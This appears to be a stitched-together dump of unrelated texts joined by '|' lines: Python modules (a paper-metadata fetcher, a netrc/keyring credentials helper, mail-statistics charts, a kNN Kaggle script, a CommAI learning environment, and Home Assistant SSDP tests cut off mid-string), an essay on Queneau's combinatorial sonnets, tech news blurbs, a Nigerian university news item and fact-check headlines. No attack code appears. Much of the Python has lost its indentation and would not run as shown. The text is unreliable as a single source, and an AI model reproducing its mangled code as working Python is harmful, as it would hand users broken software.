other_fields = ('year',
'title',
'doi',
'wbid',
'pmid')
fields = multivalued_fields + other_fields
for x in other_fields:
Evidence.DatatypeProperty(x, owner=self)
#XXX: I really don't like putting these in two places
for k in source:
if k in ('pubmed', 'pmid'):
self._fields['pmid'] = source[k]
self._pubmed_extract()
self.pmid(source[k])
if k in ('wormbaseid','wormbase', 'wbid'):
self._fields['wormbase'] = source[k]
self._wormbase_extract()
self.wbid(source[k])
if k in ('doi',):
self._fields['doi'] = source[k]
self._crossref_doi_extract()
self.doi(source[k])
if k in ('bibtex',):
self._fields['bibtex'] = source[k]
if k in fields:
getattr(self,k)(source[k])
def add_data(self, k, v):
""" Add a field
Parameters
----------
k : string
Field name
v : string
Field value
"""
self._fields[k] = v
dp = Evidence.DatatypeProperty(k,owner=self)
dp(v)
# Each 'extract' method should attempt to fill in additional fields given which ones
# are already set as well as correct fields that are wrong
# TODO: Provide a way to override modification of already set values.
def _wormbase_extract(self):
#XXX: wormbase's REST API is pretty sparse in terms of data provided.
# Would be better off using AQL or the perl interface
# _Very_ few of these have these fields filled in
wbid = self._fields['wormbase']
        def wbRequest(ident, field):
            return _json_request("http://api.wormbase.org/rest/widget/paper/" + ident + "/" + field)
# get the author
j = wbRequest(wbid, 'authors')
if 'fields' in j:
f = j['fields']
if 'data' in f:
self.author([x['label'] for x in f['data']])
elif 'name' in f:
self.author(f['name']['data']['label'])
# get the publication date
j = wbRequest(wbid, 'publication_date')
if 'fields' in j:
f = j['fields']
if 'data' in f:
self.year(f['data']['label'])
elif 'name' in f:
self.year(f['name']['data']['label'])
def _crossref_doi_extract(self):
# Extract data from crossref
def crRequest(doi):
import urllib as U
data = {'q': doi}
data_encoded = U.urlencode(data)
return _json_request('http://search.labs.crossref.org/dois?%s' % data_encoded)
doi = self._fields['doi']
if doi[:4] == 'http':
doi = _doi_uri_to_doi(doi)
r = crRequest(doi)
        # no error for bad ids, just an empty list
        if len(r) > 0:
            # Crossref can process multiple dois at one go and return the
            # metadata; we just need the first one
            r = r[0]
            #XXX: I don't think coins is meant to be used, but it has structured data...
            extra_data = r['coins'].split('&')
            fields = (x.split("=") for x in extra_data)
            fields = [[y.replace('+', ' ').strip() for y in x] for x in fields]
            authors = [x[1] for x in fields if x[0] == 'rft.au']
            for a in authors:
                self.author(a)
            if 'title' in r:
                self.title(r['title'])
            if 'year' in r:
                self.year(r['year'])
def _pubmed_extract(self):
def pmRequest(pmid):
import xml.etree.ElementTree as ET # Python 2.5 and up
base = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/'
# XXX: There's more data in esummary.fcgi?, but I don't know how to parse it
url = base + "esummary.fcgi?db=pubmed&id=%d" % pmid
return ET.parse(_url_request(url))
        pmid = self._fields['pmid']
        if isinstance(pmid, basestring) and pmid[:4] == 'http':
            # Probably a uri, right?
            pmid = _pubmed_uri_to_pmid(pmid)
        pmid = int(pmid)
tree = pmRequest(pmid)
for x in tree.findall('./DocSum/Item[@Name="AuthorList"]/Item'):
self.author(x.text)
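# A minimal end-to-end sketch, mirroring the docstring examples (the PMID is
# passed as a string; _pubmed_extract fetches metadata at construction time):
#
#     ev = Evidence(pmid="24098140")
#     ev.asserts(Connection(pre_cell="VA11", post_cell="VD12"))
#     ev.save()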
|
Poetry for me has many faces. It is the act of creation, etymologically (“poiein” in Greek “to make”). It is of course the more romantic notion of a beautiful instant (best described by Kundera in his famous quote—“The purpose of the poetry is not to dazzle us with an astonishing thought, but to make one moment of existence unforgettable and worthy of unbearable nostalgia.”). And it is an excuse to allow ourselves to play with words, as if they were physical matter, to push them against each other, make them fit atop each other, put them in motion together.
An emblematic work of the OuLiPo is "Cent Mille Milliards de Poèmes," published by Raymond Queneau in 1961. It is a book composed of 10 sonnets, each 14 verses long, printed on 10 successive pages, where each verse is cut into its own strip so that the poems can be recombined across pages in any way, yielding 10^14 poems, that is, a hundred thousand billion poems. This will be my choice as a favorite poem, although it is really more a way of making poems.
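To make the combinatorics concrete, here is a minimal Python sketch of the mechanism, with placeholder verses standing in for Queneau's text:

import random

SONNETS, LINES = 10, 14
# verses[s][l] is line l of sonnet s (placeholders, not Queneau's verses)
verses = [["sonnet %d, verse %d" % (s + 1, l + 1) for l in range(LINES)]
          for s in range(SONNETS)]

def random_poem():
    # for each of the 14 positions, pick the strip from any of the 10 pages
    return [verses[random.randrange(SONNETS)][l] for l in range(LINES)]

print("\n".join(random_poem()))
# 10 choices per position, 14 positions: 10 ** 14 distinct poems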
I have always loved constraints as a means of liberating the writer from his own "inner critic": you write words because they satisfy the constraints, not because you thought they would go well together in the first place. It allows for a kind of meditative state while writing, since you detach from meaning to give importance to the constraints. And this allows for serendipitous beauty.
In a sense, it reminds me of Joyce Dyer's description of "seeing like an animal": forcing yourself to detach from your "human prejudices" and see the world anew (as would a child, an animal, or someone forced to satisfy constraints). |
# -*- coding: utf-8 -*-
# pylint: disable=bad-continuation
""" Security / AuthN / AuthZ helpers.
"""
# Copyright © 2015 - 2019 Jürgen Hermann <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, unicode_literals, print_function
import re
import errno
import base64
import getpass
from netrc import netrc, NetrcParseError
try:
import keyring_DISABLED_FOR_NOW # TODO
except ImportError:
keyring = None
from ._compat import urlparse
__all__ = ['Credentials']
class Credentials():
"""Look up and provide authN credentials (username / password) from common sources."""
URL_RE = re.compile(r'^(http|https|ftp|ftps)://') # covers the common use cases
NETRC_FILE = None # use the default, unless changed for test purposes
AUTH_MEMOIZE_INPUT = {} # remember manual auth input across several queries in one run
def __init__(self, target):
"""``target`` is a representation of the secured object, typically an URL."""
self.target = target
self.user = None
self.password = None
self.keyring_service = target
self.source = None
def auth_valid(self):
"""Return bool indicating whether full credentials were provided."""
return bool(self.user and self.password)
def auth_pair(self, force_console=False):
"""Return username/password tuple, possibly prompting the user for them."""
if not self.auth_valid():
self._get_auth(force_console)
return (self.user, self.password)
def _raw_input(self, prompt=None):
"""Mockable wrapper for raw_input."""
return input(prompt)
def _get_auth(self, force_console=False):
"""Try to get login auth from known sources."""
if not self.target:
raise ValueError("Unspecified target ({!r})".format(self.target))
elif not force_console and self.URL_RE.match(self.target):
auth_url = urlparse(self.target)
source = 'url'
if auth_url.username:
self.user = auth_url.username
if auth_url.password:
self.password = auth_url.password
if not self.auth_valid():
source = self._get_auth_from_keyring()
if not self.auth_valid():
source = self._get_auth_from_netrc(auth_url.hostname)
if not self.auth_valid():
source = self._get_auth_from_console(self.target)
else:
source = self._get_auth_from_console(self.target)
if self.auth_valid():
self.source = source
def _get_auth_from_console(self, realm):
"""Prompt for the user and password."""
self.user, self.password = self.AUTH_MEMOIZE_INPUT.get(realm, (self.user, None))
if not self.auth_valid():
if not self.user:
login = getpass.getuser()
self.user = self._raw_input('Username for "{}" [{}]: '.format(realm, login)) or login
self.password = getpass.getpass('Password for "{}": '.format(realm))
Credentials.AUTH_MEMOIZE_INPUT[realm] = self.user, self.password
return 'console'
def _get_auth_from_netrc(self, hostname):
"""Try to find login auth in ``~/.netrc``."""
try:
hostauth = netrc(self.NETRC_FILE)
except IOError as cause:
if cause.errno != errno.ENOENT:
raise
return None
except NetrcParseError as cause:
raise # TODO: Map to common base class, so caller has to handle less error types?
# Try to find specific `user@host` credentials first, then just `host`
auth = hostauth.hosts.get('{}@{}'.format(self.user or getpass.getuser(), hostname), None)
if not auth:
auth = hostauth.hosts.get(hostname, None)
if auth:
username, account, password = auth # pylint: disable=unpacking-non-sequence
if username:
self.user = username
if password == 'base64':
# support for password obfuscation, prevent "over the shoulder lookup"
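                # e.g. a ~/.netrc entry (hypothetical host):
                #   machine ci.example.com login jane account cGFzc3dvcmQ= password base64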
self.password = base64.b64decode(account).decode('ascii')
elif password:
self.password = password
return 'netrc'
def _get_password_from_keyring(self, accountname):
"""Query keyring for a password entry."""
return keyring.get_password(self.keyring_service, accountname)
def _get_auth_from_keyring(self):
"""Try to get credentials using `keyring <https://github.com/jaraco/keyring>`_."""
if not keyring:
return None
# Take user from URL if available, else the OS login name
password = self._get_password_from_keyring(self.user or getpass.getuser())
if password is not None:
self.user = self.user or getpass.getuser()
self.password = password
return 'keyring'
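# A minimal usage sketch (hypothetical URL; the lookup order in _get_auth is
# URL userinfo, then keyring, then ~/.netrc, with a console prompt as the
# final fallback):
#
#     creds = Credentials("https://jane@ci.example.com/job/42")
#     username, password = creds.auth_pair()
#     print(creds.source)  # one of 'url', 'keyring', 'netrc', 'console'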
|
While this was a major accomplishment, it went almost entirely unnoticed. That could be, in part, because only two people in the world had a web browser with which to access it. In fact, it wasn't until 1993, when Mosaic was released, that the general populace had the ability to access the web at all.
For more on the history of the web, hit the break.
Sony had a powerful E3 presentation where the Vita brought hope to all Sony fans, and even myself, that innovation had once again found itself ingrained within the Sony handheld's precious metals. While that still seems to be true, no one here in the US or Europe should expect to have their anxiety curbed this holiday season, according to Sony Executive Vice President Kazuo Hirai.
Despite the fact that Hirai announced at E3 that the Vita would be available "starting from the holiday season this year," he made another announcement on August 4th that this would not be the case. The US and Europe (but more importantly, the US) shouldn't expect the Vita to grace store shelves until early next year. Missing out on the retail golden quarter might have certain ramifications for the Vita; more on that after the break.
WIRED: Report: Sony’s PlayStation Vita Will Miss Holiday Launch in U.S.
We have finally reached the end of the small battle between the RIAA and LimeWire this week, as they have reached a payout agreement. You may recall that LimeWire has been on the hook for $105 million from several record labels, and the RIAA was so proud of themselves for putting that together that they felt they could pretty much do anything, so long as they got help from the crazy legislators in California.
This week we learned that LimeWire had to write a check for $12 million to the Warner Music Group. That might not be anywhere close to the $1 billion in damages Warner claimed to have suffered at the hands of the former P2P software, but I suppose that's better than nothing. Still, $12 million is only 1.7% of the revenue Warner does in a quarter. So in the end, it's more like a drop in the Atlantic Ocean.
No matter how much money was issued to these labels, though, it feels like they'd never be happy. Warner may have claimed $1 billion, but you know they would complain until they saw $3 billion in their account. The good news for them is that revenue was up 5% for the second quarter, attributed to digital sales that were up 13%. The important number, though, is that they still posted a net loss of $47 million. Seems like that $12 million might have helped them out more than they thought. |
from pygooglechart import StackedVerticalBarChart, Axis
from base import *
_Y_AXIS_SPACE = 36
class BucketStat(ChartStat):
def __init__(self, bucket_count, title, width, height):
ChartStat.__init__(self)
self.__buckets = [0] * bucket_count
self.__max = 0
self.__title = title
self.__width = width
self.__height = height
def _GetBucketCollection(self, message_infos, threads):
return message_infos
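  # Subclasses map each item to a bucket index via _GetBucket (returning None
  # to skip the item) and label the x-axis via _GetBucketLabels; by default
  # items are message_infos, but _GetBucketCollection may return threads
  # instead (see ThreadSizeBucketStat below).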
def ProcessMessageInfos(self, message_infos, threads):
for bucket_obj in self._GetBucketCollection(message_infos, threads):
bucket = self._GetBucket(bucket_obj)
if bucket is None: continue
self.__buckets[bucket] += 1
v = self.__buckets[bucket]
if v > self.__max:
self.__max = v
def GetHtml(self):
max = self._GetRescaledMax(self.__max)
w = self.__width
h = self.__height
# We don't really care about StackedVerticalBarChart vs.
# GroupedVerticalBarChart since we just have one data-set, but only the
# stacked graph seems to respect the bar spacing option
chart = StackedVerticalBarChart(w, h)
# Compute bar width so that it fits in the overall graph width.
bucket_width = (w - _Y_AXIS_SPACE)/len(self.__buckets)
bar_width = bucket_width * 4/5
space_width = bucket_width - bar_width
chart.set_bar_width(bar_width)
chart.set_bar_spacing(space_width)
chart.add_data(self._GetRescaledData(self.__buckets, max))
chart.set_axis_range(Axis.LEFT, 0, max)
chart.set_axis_labels(Axis.BOTTOM, self._GetBucketLabels())
# We render the title in the template instead of in the chart, to give
# stat collections and individual stats similar appearance
t = Template(
file="templates/bucket-stat.tmpl",
searchList = {
"id": self.id,
"title": self.__title,
"width": w,
"height": h,
"chart_url": chart.get_url()
})
return unicode(t)
class TimeOfDayStat(BucketStat):
def __init__(self):
BucketStat.__init__(self, 24, 'Time of day', 400, 200)
def _GetBucket(self, message_info):
return message_info.GetDate().tm_hour
def _GetBucketLabels(self):
return ['Midnight', '', '', '', '', '',
'6 AM', '', '', '', '', '',
'Noon', '', '', '', '', '',
' 6 PM', '', '', '', '', '']
class DayOfWeekStat(BucketStat):
def __init__(self):
BucketStat.__init__(self, 7, 'Day of week', 300, 200)
def _GetBucket(self, message_info):
# In the time tuple Monday is 0, but we want Sunday to be 0
return (message_info.GetDate().tm_wday + 1) % 7
def _GetBucketLabels(self):
return ['S', 'M', 'T', 'W', 'T', 'F', 'S']
class YearStat(BucketStat):
def __init__(self, date_range):
self.__years = GetYearRange(date_range)
width = _Y_AXIS_SPACE + 30 * len(self.__years)
BucketStat.__init__(
self, len(self.__years), "Year", width, 200)
def _GetBucket(self, message_info):
return message_info.GetDate().tm_year - self.__years[0]
def _GetBucketLabels(self):
return [str(x) for x in self.__years]
class MonthStat(BucketStat):
def __init__(self, year):
self.__year = year
# No title is necessary, since the stat collection provides one
BucketStat.__init__(self, 12, None, 300, 200)
def _GetBucket(self, message_info):
date = message_info.GetDate()
if date.tm_year == self.__year:
return date.tm_mon - 1
else:
return None
def _GetBucketLabels(self):
return MONTH_NAMES
class DayStat(BucketStat):
def __init__(self, year, month):
self.__year = year
self.__month = month
self.__days_in_month = calendar.monthrange(year, month)[1]
# No title is necessary, since the stat collection provides one
BucketStat.__init__(
self,
self.__days_in_month,
None,
500,
200)
def _GetBucket(self, message_info):
date = message_info.GetDate()
if date.tm_year == self.__year and date.tm_mon == self.__month:
return date.tm_mday - 1
else:
return None
def _GetBucketLabels(self):
return [str(d) for d in range(1, self.__days_in_month + 1)]
class SizeBucketStat(BucketStat):
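  # Byte-size thresholds: 0, then powers of two from 512 B (1 << 9) up to
  # 8 MiB (1 << 23); each message falls into the highest bucket it reaches.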
_SIZE_BUCKETS = [
0,
1 << 9,
1 << 10,
1 << 11,
1 << 12,
1 << 13,
1 << 14,
1 << 15,
1 << 16,
1 << 17,
1 << 18,
1 << 19,
1 << 20,
1 << 21,
1 << 22,
1 << 23,
]
def __init__(self):
BucketStat.__init__(
self,
len(SizeBucketStat._SIZE_BUCKETS),
"Message sizes",
500,
200)
def _GetBucket(self, message_info):
size = message_info.size
for i in reversed(xrange(0, len(SizeBucketStat._SIZE_BUCKETS))):
if size >= SizeBucketStat._SIZE_BUCKETS[i]:
return i
def _GetBucketLabels(self):
return [GetDisplaySize(s) for s in SizeBucketStat._SIZE_BUCKETS]
class ThreadSizeBucketStat(BucketStat):
_SIZE_BUCKETS = [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
20,
30,
40,
50,
100,
150,
200,
]
def __init__(self):
BucketStat.__init__(
self,
len(ThreadSizeBucketStat._SIZE_BUCKETS),
"Thread lengths",
500,
200)
def _GetBucketCollection(self, message_infos, threads):
return threads
def _GetBucket(self, thread):
size = len(thread)
for i in reversed(xrange(0, len(ThreadSizeBucketStat._SIZE_BUCKETS))):
if size >= ThreadSizeBucketStat._SIZE_BUCKETS[i]:
return i
def _GetBucketLabels(self):
return [str(s) for s in ThreadSizeBucketStat._SIZE_BUCKETS] |
Vice Chancellor of Veritas University, Abuja, Prof. Michael Kwanashie, has restated the institution’s zero tolerance for cultism and other social vices commonly associated with students in tertiary institutions.
Kwanashie, who issued the warning while delivering an address at the 8th matriculation of the university, held at its main campus in Bwari, Abuja, said culprits could face outright expulsion without an opportunity to make amends.
According to the VC, the warning became necessary as the university was also admitting students who had left other universities to pursue academic studies in the institution. He stated that exam malpractice would not be tolerated either.
He dispelled claims that the social life of the school was boring and urged students to be of good conduct and create their own social life within the campus instead of spending nights out in the city.
Speaking further on the employability of graduates from the institution, Kwanashie disclosed that in line with the mandatory entrepreneurship policy of the federal government for all universities, Veritas University ensures that no student graduates without proper training on entrepreneurship.
He said the university had gone into an agreement with CISCO to have CISCO-trained and certified graduates, adding that the institution was also trying to work out an agreement with Microsoft Corporation to ensure that, apart from their degrees, the students also have skills in other competencies.
The VC disclosed that the school also has a placement office where it can scout for jobs for students from employers and highlight areas of the students’ competencies.
Veritas University is currently experiencing tremendous growth in population, as 452 students were matriculated for the 2016/2017 academic session, about twice the number matriculated in 2015. |
# Loading Data
import pandas as pd
from skimage.io import imread
import numpy as np
def read_data(typeData, labelsInfo, imageSize, path):
#Intialize x matrix
x = np.zeros((labelsInfo.shape[0], imageSize))
for (index, idImage) in enumerate(labelsInfo["ID"]):
#Read image file
nameFile = "{0}/{1}Resized/{2}.Bmp".format(path, typeData, idImage)
img = imread(nameFile, as_grey=True)
x[index, :] = np.reshape(img, (1, imageSize))
return x
imageSize = 400 # 20 x 20 pixels
#Set location of data files , folders
path = "/home/guo/haplox/Github/first_step_with_julia_kaggle/data/data"
labelsInfoTrain = pd.read_csv("{0}/trainLabels.csv".format(path))
#Read training matrix
xTrain = read_data("train", labelsInfoTrain, imageSize, path)
#Read information about test data ( IDs ).
labelsInfoTest = pd.read_csv("{0}/sampleSubmission.csv".format(path))
#Read test matrix
xTest = read_data("test", labelsInfoTest, imageSize, path)
yTrain = map(ord, labelsInfoTrain["Class"])
yTrain = np.array(yTrain)
# Importing main functions
from sklearn.cross_validation import cross_val_score as k_fold_CV
from sklearn.neighbors import KNeighborsClassifier as KNN
from sklearn.grid_search import GridSearchCV
# Running 2-fold CV with 1NN sequentially
import time
start = time.time()
model = KNN(n_neighbors=1)
cvAccuracy = np.mean(k_fold_CV(model, xTrain, yTrain, cv=2, scoring="accuracy"))
print "The 2-CV accuracy of 1NN", cvAccuracy
print time.time() - start, "seconds elapsed"
# Tuning the value for k
start = time.time()
tuned_parameters = [{"n_neighbors":list(range(1,5))}]
clf = GridSearchCV( model, tuned_parameters, cv=5, scoring="accuracy")
clf.fit(xTrain, yTrain)
print clf.grid_scores_
print time.time() - start, "seconds elapsed"
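# A possible next step (sketch, Python 2 style like the rest of this script):
# refit the tuned model on the full training set and write a submission file,
# mapping numeric labels back to characters with chr(). The file name is
# hypothetical.
#model = KNN(n_neighbors=clf.best_params_["n_neighbors"])
#model.fit(xTrain, yTrain)
#labelsInfoTest["Class"] = map(chr, model.predict(xTest))
#labelsInfoTest.to_csv("{0}/knnSubmission.csv".format(path), index=False)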
|
|
# Copyright (c) 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from core.events import EventManager
from core.task import StateChanged, MessageReceived, \
SequenceReceived, OutputSequenceUpdated, OutputMessageUpdated
from core.obs.observer import Observable
from core.serializer import ScramblingSerializerWrapper
from core.channels import InputChannel, OutputChannel
from core.byte_channels import ByteInputChannel, ByteOutputChannel
from collections import defaultdict
import logging
class Environment:
'''
The Environment is the one that communicates with the Learner,
interpreting its output and reacting to it. The interaction is governed
by an ongoing task which is picked by a TaskScheduler object.
:param serializer: a Serializer object that translates text into binary and
back.
:param task_scheduler: a TaskScheduler object that determines which task
is going to be run next.
:param scramble: if True, the words outputted by the tasks are randomly
scrambled.
:param max_reward_per_task: maximum amount of reward that a learner can
receive for a given task.
'''
def __init__(self, serializer, task_scheduler, scramble=False,
max_reward_per_task=10000, byte_mode=False):
# save parameters into member variables
self._task_scheduler = task_scheduler
self._serializer = serializer
self._max_reward_per_task = max_reward_per_task
# cumulative reward per task
self._reward_per_task = defaultdict(int)
# the event manager is the controller that dispatches
# changes in the environment (like new inputs or state changes)
# to handler functions in the tasks that tell the environment
# how to react
self.event_manager = EventManager()
        # initialize member variables
self._current_task = None
self._current_world = None
if scramble:
serializer = ScramblingSerializerWrapper(serializer)
if byte_mode:
            # we listen to our own output
self._output_channel_listener = ByteInputChannel(serializer)
# output channel
self._output_channel = ByteOutputChannel(serializer)
# input channel
self._input_channel = ByteInputChannel(serializer)
else:
            # we listen to our own output
self._output_channel_listener = InputChannel(serializer)
# output channel
self._output_channel = OutputChannel(serializer)
# input channel
self._input_channel = InputChannel(serializer)
# priority of ongoing message
self._output_priority = 0
# reward that is to be given at the learner at the end of the task
self._reward = None
self._result = None
self._last_result = None
# reward that is to be given immediately
self._immediate_reward = None
# Current task time
self._task_time = None
# Task separator issued
self._task_separator_issued = False
# Internal logger
self.logger = logging.getLogger(__name__)
# signals
self.world_updated = Observable()
self.task_updated = Observable()
# Register channel observers
self._input_channel.sequence_updated.register(
self._on_input_sequence_updated)
self._input_channel.message_updated.register(
self._on_input_message_updated)
self._output_channel_listener.sequence_updated.register(
self._on_output_sequence_updated)
self._output_channel_listener.message_updated.register(
self._on_output_message_updated)
def next(self, learner_input):
'''Main loop of the Environment. Receives one bit from the learner and
produces a response (also one bit)'''
self._last_result = None # will be set while execution is inside this function or its child tree
# Make sure we have a task
if not self._current_task:
self._switch_new_task()
# If the task has not reached the end by either Timeout or
# achieving the goal
if not self._current_task.has_ended():
reward = None
# Check if a Timeout occurred
self._current_task.check_timeout(self._task_time)
# Process the input from the learner and raise events
if learner_input is not None:
# record the input from the learner and deserialize it
# TODO this bit is dropped otherwise on a timeout...
self._input_channel.consume(learner_input)
# switch to next task immediately if this input caused the task to end
# and there is no feedback to output (output_channel is empty)
if self._current_task.has_ended() and self._output_channel.is_empty():
self._switch_new_task()
# We are in the middle of the task, so no rewards are given
else:
# If the task is ended and there is nothing else to say,
# issue a silence and then return reward and move to next task
if self._output_channel.is_empty():
if self._task_separator_issued or self._should_skip_separator():
# Have nothing more to say
# reward the learner if necessary and switch to new task
reward = self._reward if self._reward is not None else 0
self._switch_new_task()
self._task_separator_issued = False
else:
self._output_channel.set_message(
self._serializer.SILENCE_TOKEN)
self._task_separator_issued = True
reward = None
else:
# TODO: decide what to do here.
# Should we consume the bit or not?
self._input_channel.consume(learner_input)
# If there is still something to say, continue saying it
reward = None
# Get one bit from the output buffer and ship it
if self._output_channel.is_empty():
self._output_channel.set_message(self._serializer.SILENCE_TOKEN)
output = self._output_channel.consume()
        # we listen to ourselves
self._output_channel_listener.consume(output)
# advance time
self._task_time += 1
if self._immediate_reward is not None and reward is None:
reward = self._immediate_reward
self._immediate_reward = None
if reward is not None:
# process the reward (clearing it if it's not allowed)
reward = self._allowable_reward(reward)
else:
reward = 0
return output, reward
def get_reward_per_task(self):
'''
        Returns a dictionary that contains the cumulative reward for each
task.
'''
return self._reward_per_task
def _allowable_reward(self, reward):
'''Checks if the reward is allowed within the limits of the
`max_reward_per_task` parameter, and resets it to 0 if not.'''
task_name = self._current_task.get_name()
if self._reward_per_task[task_name] < self._max_reward_per_task:
self._reward_per_task[task_name] += reward
return reward
else:
return 0
def is_silent(self):
'''
Tells if the environment is sending any information through the output
channel.
'''
return self._output_channel.is_silent()
def _on_input_sequence_updated(self, sequence):
if self.event_manager.raise_event(SequenceReceived(sequence)):
self.logger.debug("Sequence received by running task: '{0}'".format(
sequence))
def _on_input_message_updated(self, message):
# send the current received message to the task
if self.event_manager.raise_event(MessageReceived(
message)):
self.logger.debug("Message received by running task: '{0}'".format(
message))
def _on_output_sequence_updated(self, sequence):
self.event_manager.raise_event(OutputSequenceUpdated(sequence))
def _on_output_message_updated(self, message):
self.event_manager.raise_event(OutputMessageUpdated(message))
def _should_skip_separator(self):
return hasattr(self._current_task, 'skip_task_separator') and self._current_task.skip_task_separator
def set_result(self, result, message='', priority=0, provide_result_as_reward=True):
# the following two ifs prevent repeating the same feedback ad infinitum, which otherwise happens in mini-tasks
# in case of a repeated invalid input. self._result is set back to None every time a new task is switched.
if self._result is True and result is True:
return
if self._result is False and result is False:
return
if provide_result_as_reward:
self._reward = result
self._result = result
self._current_task.end()
self.logger.debug('Terminating instance with result {0} with message "{1}"'
' and priority {2}'
.format(result, message, priority))
# adds a final space to the final message of the task
# to separate the next task instructions
self.set_message(message, priority)
def set_immediate_reward(self, reward):
'''Sets the reward immediately'''
self._immediate_reward = reward
self.logger.debug('Setting immediate reward {}'.format(reward))
def set_message(self, message, priority=0):
''' Saves the message in the output buffer so it can be delivered
bit by bit. It overwrites any previous content.
'''
if self._output_channel.is_empty() or priority >= self._output_priority:
self.logger.debug('Setting message "{0}" with priority {1}'
.format(message, priority))
self._output_channel.set_message(message)
self._output_priority = priority
else:
self.logger.info(
'Message "{0}" blocked because of '
'low priority ({1}<{2}) '.format(
message, priority, self._output_priority)
)
def raise_event(self, event):
return self.event_manager.raise_event(event)
def raise_state_changed(self):
'''
        This raises a StateChanged Event, meaning that something
        in the state of the world or the tasks changed (but we
        don't keep track of what)
'''
# state changed events can only be raised if the current task is
# started
if self._current_task and self._current_task.has_started():
# tasks that have a world should also take the world state as
# an argument
if self._current_world:
self.raise_event(StateChanged(
self._current_world.state, self._current_task.state))
else:
self.raise_event(StateChanged(self._current_task.state))
return True
return False
def _switch_new_task(self):
'''
Asks the task scheduler for a new task,
reset buffers and time, and registers the event handlers
'''
# deregister previous event managers
if self._current_task:
self._current_task.deinit()
self._deregister_task_triggers(self._current_task)
# pick a new task
        if self._result is not None:
self._last_result = self._result
self._task_scheduler.reward(self._result)
self._result = None
self._current_task = self._task_scheduler.get_next_task()
try:
# This is to check whether the user didn't mess up in instantiating
# the class
self._current_task.get_world()
except TypeError:
raise RuntimeError("The task {0} is not correctly instantiated. "
"Are you sure you are not forgetting to "
"instantiate the class?".format(
self._current_task))
self.logger.debug("Starting new task: {0}".format(self._current_task))
# check if it has a world:
if self._current_task.get_world() != self._current_world:
# if we had an ongoing world, end it.
if self._current_world:
self._current_world.end()
self._deregister_task_triggers(self._current_world)
self._current_world = self._current_task.get_world()
if self._current_world:
# register new event handlers for the world
self._register_task_triggers(self._current_world)
# initialize the new world
self._current_world.start(self)
self.world_updated(self._current_world)
# reset state
self._task_time = 0
self._reward = None
self._input_channel.clear()
self._output_channel.clear()
self._output_channel_listener.clear()
# register new event handlers
self._register_task_triggers(self._current_task)
# start the task, sending the current environment
# so it can interact by sending back rewards and messages
self._current_task.start(self)
self.task_updated(self._current_task)
def _deregister_task_triggers(self, task):
for trigger in task.get_triggers():
try:
self.event_manager.deregister(task, trigger)
except ValueError:
# if the trigger was not registered, we don't worry about it
pass
except KeyError:
# if the trigger was not registered, we don't worry about it
pass
task.clean_dynamic_handlers()
def _register_task_triggers(self, task):
for trigger in task.get_triggers():
self._register_task_trigger(task, trigger)
def _register_task_trigger(self, task, trigger):
self.event_manager.register(task, trigger)
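# A minimal driving-loop sketch (hypothetical serializer and task_scheduler
# objects; a real learner would choose its next bit from `output` and the
# reward instead of merely echoing):
#
#     env = Environment(serializer, task_scheduler)
#     learner_output = None
#     for _ in range(1000):
#         output, reward = env.next(learner_output)
#         learner_output = output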
|
VERIFY: Can cell phone usage at gas pumps cause explosions?
A WUSA9 viewer came across an article that claims a car exploded at a gas station after parents let their kids play a mobile game on a cell phone.
VERIFY: Did YouTube's fake news feature flag Notre Dame live streams, provide information about 9/11?
A YouTube spokesperson confirmed an information panel about 9/11 accompanied live streams of a burning Notre Dame, before the panels were deactivated on all streams.
It's tax deadline season and our Verify team is fact-checking all the online rumors that you may have questions about.
VERIFY: Does filing separately from your spouse mean forfeiting your student loan deduction?
Fox Business issued a correction Thursday morning for a typo on a Georgetown University polling graphic after the GU Politics Director called them out for the mistake.
VERIFY: Is there a policy against walking dogs on Howard University?
A PoPville blog post has readers buzzing: Can you walk your pup on private grounds?
VERIFY | First three House bills introduced by Democrats in 2019: impeachment, electoral college ban, and $54 million in foreign aid?
Political mudslinging online is nothing new, but is this viral meme about the first three bills House Democrats introduced legit? The Verify team got answers. |
"""Test the SSDP integration."""
import asyncio
from unittest.mock import Mock, patch
import aiohttp
import pytest
from homeassistant.components import ssdp
from tests.common import mock_coro
async def test_scan_match_st(hass, caplog):
"""Test matching based on ST."""
scanner = ssdp.Scanner(hass, {"mock-domain": [{"st": "mock-st"}]})
with patch(
"netdisco.ssdp.scan",
return_value=[
Mock(
st="mock-st",
location=None,
values={"usn": "mock-usn", "server": "mock-server", "ext": ""},
)
],
), patch.object(
hass.config_entries.flow, "async_init", return_value=mock_coro()
) as mock_init:
await scanner.async_scan(None)
assert len(mock_init.mock_calls) == 1
assert mock_init.mock_calls[0][1][0] == "mock-domain"
assert mock_init.mock_calls[0][2]["context"] == {"source": "ssdp"}
assert mock_init.mock_calls[0][2]["data"] == {
ssdp.ATTR_SSDP_ST: "mock-st",
ssdp.ATTR_SSDP_LOCATION: None,
ssdp.ATTR_SSDP_USN: "mock-usn",
ssdp.ATTR_SSDP_SERVER: "mock-server",
ssdp.ATTR_SSDP_EXT: "",
}
assert "Failed to fetch ssdp data" not in caplog.text
@pytest.mark.parametrize(
"key", (ssdp.ATTR_UPNP_MANUFACTURER, ssdp.ATTR_UPNP_DEVICE_TYPE)
)
async def test_scan_match_upnp_devicedesc(hass, aioclient_mock, key):
"""Test matching based on UPnP device description data."""
aioclient_mock.get(
"http://1.1.1.1",
text=f"""
<root>
<device>
<{key}>Paulus</{key}>
</device>
</root>
""",
)
scanner = ssdp.Scanner(hass, {"mock-domain": [{key: "Paulus"}]})
with patch(
"netdisco.ssdp.scan",
return_value=[Mock(st="mock-st", location="http://1.1.1.1", values={})],
), patch.object(
hass.config_entries.flow, "async_init", return_value=mock_coro()
) as mock_init:
await scanner.async_scan(None)
assert len(mock_init.mock_calls) == 1
assert mock_init.mock_calls[0][1][0] == "mock-domain"
assert mock_init.mock_calls[0][2]["context"] == {"source": "ssdp"}
async def test_scan_not_all_present(hass, aioclient_mock):
"""Test match fails if some specified attributes are not present."""
aioclient_mock.get(
"http://1.1.1.1",
text="""
